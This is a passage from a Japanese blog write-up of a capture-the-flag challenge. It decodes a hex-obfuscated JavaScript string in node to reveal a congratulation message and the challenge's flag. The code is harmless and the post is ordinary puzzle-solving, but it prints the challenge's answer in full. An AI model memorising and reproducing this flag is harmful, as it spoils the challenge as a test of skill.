<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=color:#8be9fd;font-style:italic>var</span> _0xee0b<span style=color:#ff79c6>=</span>[<span style=color:#f1fa8c>&#34;\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D&#34;</span>];<span style=color:#8be9fd;font-style:italic>var</span> y<span style=color:#ff79c6>=</span>_0xee0b[<span style=color:#bd93f9>0</span>];
</code></pre></div><p>JavaScriptっぽいのでnodeに与えてみます。</p>
<div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-js data-lang=js><span style=color:#ff79c6>&gt;</span> <span style=color:#8be9fd;font-style:italic>var</span> _0xee0b<span style=color:#ff79c6>=</span>[<span style=color:#f1fa8c>&#34;\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D&#34;</span>];<span style=color:#8be9fd;font-style:italic>var</span> y<span style=color:#ff79c6>=</span>_0xee0b[<span style=color:#bd93f9>0</span>];
<span style=color:#ff79c6>undefined</span>
<span style=color:#ff79c6>&gt;</span> _0xee0b
[ <span style=color:#f1fa8c>&#39;YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb  :) key{Those Fluffy Bunnies Make Tummy Bumpy}&#39;</span> ]
</code></pre></div><p>というわけで無事にフラグを得ることができました。</p>
</div>
</div>
</div>
<script src=https://aquarite.info/js/ui.js></script>
<script src=https://aquarite.info/js/menus.js></script>
<script data-goatcounter=https://aquarite.goatcounter.com/count async src=//gc.zgo.at/count.js></script>
</body>
</html>